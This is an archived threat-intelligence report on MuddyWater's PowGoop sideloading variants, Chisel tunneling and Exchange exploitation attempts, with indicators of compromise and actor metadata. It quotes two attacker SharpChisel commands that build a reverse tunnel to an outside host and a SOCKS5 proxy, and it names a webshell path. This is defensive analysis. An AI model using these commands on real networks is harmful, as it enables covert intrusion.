{
	"id": "f8e3ac04-4c5f-430e-96d1-1d7f285cdad9",
	"created_at": "2026-04-06T00:22:07.110019Z",
	"updated_at": "2026-04-10T13:11:38.026254Z",
	"deleted_at": null,
	"sha1_hash": "d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32",
	"title": "Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1145569,
	"plain_text": "Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor\r\nBy Amitai Ben Shushan Ehrlich\r\nPublished: 2022-01-12 · Archived: 2026-04-05 14:40:47 UTC\r\nOverview\r\nMuddyWater is commonly considered an Iranian state-sponsored threat actor, but no further granularity has previously been available. As of January 12th, 2022, U.S. Cyber Command has attributed this activity to the Iranian Ministry of Intelligence (MOIS). While some cases allow for attribution hunches, or even fleshed-out connections to handles and online personas, attribution to a particular government organization is often reserved to the kind of visibility only available to governments with a well-developed all-source and signals intelligence apparatus.\r\nAs in all cases of public government attribution, we take this as an opportunity to reassess our assumptions about a given threat actor, all the while recognizing that we can’t independently verify the basis for this claim.\r\nU.S. Cyber Command pointed to multiple malware sets used by MuddyWater. Among those, PowGoop correlates with activities we’ve triaged in recent incidents. We hope sharing relevant in-the-wild findings will further bolster our collective defense against this threat.\r\nAnalysis of New PowGoop Variants\r\nPowGoop is a malware family first described by Palo Alto which utilizes DLL search order hijacking (T1574.001). The name derives from the use of ‘GoogleUpdate.exe’ to load a malicious modified version of ‘goopdate.dll’, which in turn loads a malicious PowerShell script from an external file. Other variants were described by ClearSkySec and Symantec.\r\nWe identified newer variants of the PowGoop loader that involve significant changes, suggesting the group continues to use and maintain it even after recent exposures. The new variants reveal that the threat group has expanded its arsenal of legitimate software used to load malicious DLLs. Aside from ‘GoogleUpdate.exe’, three additional benign pieces of software are abused in order to sideload malicious DLLs: ‘Git.exe’, ‘FileSyncConfig.exe’ and ‘Inno_Updater.exe’.\r\nEach contains a modified DLL and a renamed authentic DLL. The hijacked DLL contains imports originating from its renamed counterpart, as well as two additional functions written by the attackers. The list of hijacked DLLs is presented below:\r\nSoftware Name | Hijacked DLL | Renamed DLL\r\nGoogleUpdate.exe | goopdate.dll | goopdate86.dll\r\ninno_updater.exe | vcruntime140.dll | vcruntime141.dll\r\nFileSyncConfig.exe | vcruntime140.dll | vcruntime141.dll\r\ngit.exe | libpcre2-8-0.dll | libpcre2-8-1.dll\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 1 of 6\r\nUnlike previous versions, the hijacked DLLs attempt to reflectively load two additional files: one named ‘Core.dat’, which is shellcode called from the export ‘DllReg’, and the other named ‘Dore.dat’, which is a PE file with an ‘MZRE’ header, allowing it to execute as shellcode as well, similarly to publicly reported techniques, called from the export ‘DllRege’.\r\nThose two ‘.dat’ files are identical for each of the hijacked DLLs and are both executed using rundll32 on their respective export, which reads the file from disk into a virtually allocated buffer, followed by a call to offset 0 of the read data.\r\nBoth ‘Dore.dat’ and ‘Core.dat’ search for a file named ‘config.txt’ and run it using PowerShell in a fashion similar to older versions (T1059.001). The overlap in functionality between the two components is not clear; however, it is evident that ‘Core.dat’ represents a more mature and evolved version of PowGoop, as it is loaded as shellcode, making it less likely to be detected statically.\r\nIt is also worth noting that it is not necessary for both components to reside on the infected system, as the malware will execute successfully with either one. Given that, it is possible that one or the other could be used as a backup component. The PowerShell payloads within ‘config.txt’ could not be retrieved at the time of writing.\r\nExecution flow of new PowGoop variants\r\nMuddyWater Tunneling Activity\r\nThe operators behind MuddyWater activities are very fond of tunneling tools, as described in several recent blog posts (T1572). The custom tools used by the group often provide limited functionality, and are used to drop tunneling tools which enable the operators to conduct a wider set of activities. Among the tunneling tools MuddyWater attackers were observed using are Chisel, SSF and Ligolo.\r\nThe nature of tunneling activities is often confusing. However, analysis of Chisel executions by MuddyWater operators on some of the victims helps clarify their usage of such tools. This is an example of a command executed by the attackers on some of the victims:\r\nSharpChisel.exe client xx.xx.xx.xx:8080 r:8888:127.0.0.1:9999\r\nThe “r” flag used in the client execution implies the server is running in “reverse” mode. Setting the --reverse flag, according to Chisel documentation, “allows clients to specify reverse port forwarding remotes in addition to normal remotes”.\r\nIn this case, the “SharpChisel.exe” client runs on the victim machine, connects back to the Chisel server over port 8080, and specifies to forward anything coming over port 8888 of the server to port 9999 of the client.\r\nThis might look odd at first sight, as port 9999 is not normally used on Windows machines and is not bound to any specific service. This is clarified shortly afterwards, as the reverse tunnel is followed by setting up a Chisel SOCKS5 server on the victim, waiting for incoming connections over port 9999:\r\nSharpChisel.exe server -p 9999 --socks5\r\nBy setting up both a server and a client instance of Chisel on the machine, the operators enable themselves to tunnel a variety of protocols which are supported over SOCKS5. This actually creates a tunnel within a tunnel. Given that, it is most likely the operator initiated SOCKS traffic to the server over port 8888, tunneling traffic from applications of interest to inner parts of the network.\r\nThe usage of Chisel and other tunneling tools effectively enables the threat actor to connect to machines within target environments as if they were inside the operator LAN.\r\nSummary of MuddyWater tunneling using Chisel\r\nExchange Exploitation\r\nWhen tracking MuddyWater activity, we came across an interesting subset of activity targeting Exchange servers of high-profile organizations. This subset of Exchange exploitation activity is rather interesting, as without context it would be difficult to attribute it to MuddyWater, because the activity relies almost completely on publicly available offensive security tools.\r\nThe attackers attempt to exploit Exchange servers using two different tools:\r\n- A publicly available script for exploiting CVE-2020-0688 (T1190)\r\n- Ruler – an open source Exchange exploitation framework\r\nCVE-2020-0688 Exploitation\r\nAnalysis of the activity observed suggests the MuddyWater threat group attempted to exploit CVE-2020-0688 on governmental organizations in the Middle East. The exploit enables remote code execution for an authenticated user. The specific exploit MuddyWater operators were attempting to run was utilized to drop a webshell.\r\nThe attempted webshell drop was performed using a set of PowerShell commands that write the webshell content into a specific path, “/ecp/HybridLogout.aspx”. The webshell awaits the parameter “cmd” and runs the commands in it utilizing XSL Script Processing (T1220).\r\nA snippet of the webshell MuddyWater attempted to upload to Exchange servers\r\nThis activity is highly correlated with a CVE-2020-0688 exploitation script from a Github repository named fuckchina_v2.py. The script utilizes CVE-2020-0688 to upload an ASPX webshell to the path “/ecp/HybridLogout.aspx” (T1505.003). It is also one of the only publicly available CVE-2020-0688 implementations that drop a web shell.\r\nA snippet of CVE-2020-0688 exploitation script\r\nRuler Exploitation\r\nAmong other activities performed by the threat actors was attempted Ruler exploitation. The instance identified targeted a telecommunication company in the Middle East. The observed activity suggests the threat actor attempted to create malicious forms, which is one of the most common usages of Ruler (T1137.003).\r\nUsage of Ruler was previously associated with other Iranian threat actors, most commonly with APT33.\r\nSummary\r\nAnalysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques. While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection. This is reflected in the three distinct activities analyzed in this report: the evolution of the PowGoop malware family, the usage of tunneling tools, and the targeting of Exchange servers in high-profile organizations.\r\nLike many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistence is a key to their success, and their lack of sophistication does not appear to prevent them from achieving their goals.\r\nIndicators of Compromise\r\nPowGoop variants (MD5, SHA1, SHA256)\r\nGoopdate.dll\r\nA5981C4FA0A3D232CE7F7CE1225D9C7E\r\n8FED2FF6B739C13BADB14C1A884D738C80CB6F34\r\nAA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94\r\nLibpcre2-8-0.dll\r\nF8E7FF6895A18CC3D05D024AC7D8BE3E\r\n97248B6E445D38D48334A30A916E7D9DDA33A9B2\r\nF1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3\r\nVcruntime140.dll\r\nCEC48BCDEDEBC962CE45B63E201C0624\r\n81F46998C92427032378E5DEAD48BDFC9128B225\r\nDD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92\r\nCore.dat\r\nA65696D6B65F7159C9FFCD4119F60195\r\n570F7272412FF8257ED6868D90727A459E3B179E\r\nB5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504\r\nDore.dat\r\n6C084C8F5A61C6BEC5EB5573A2D51FFB\r\n61608ED1DE56D0E4FE6AF07ECBA0BD0A69D825B8\r\n7E7545D14DF7B618B3B1BC24321780C164A0A14D3600DBAC0F91AFBCE1A2F9F4\r\nMITRE ATT\u0026CK\r\nT1190 – Exploit Public-Facing Application\r\nT1572 – Protocol Tunneling\r\nT1574.001 – Hijack Execution Flow: DLL Search Order Hijacking\r\nT1059.001 – Command and Scripting Interpreter: PowerShell\r\nT1505.003 – Server Software Component: Web Shell\r\nT1220 – XSL Script Processing\r\nSource: https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/"
	],
	"report_names": [
		"wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor"
	],
	"threat_actors": [
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33",
				"Elfin",
				"HOLMIUM",
				"MAGNALIUM",
				"Peach Sandstorm",
				"Refined Kitten",
				"TA451"
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens",
				"ENT-11",
				"Earth Vetala",
				"ITG17",
				"MERCURY",
				"Mango Sandstorm",
				"MuddyWater",
				"STAC 1171",
				"Seedworm",
				"Static Kitten",
				"TA450",
				"TEMP.Zagros",
				"UNC3313",
				"Yellow Nix"
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434927,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.pdf",
		"text": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.txt",
		"img": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.jpg"
	}
}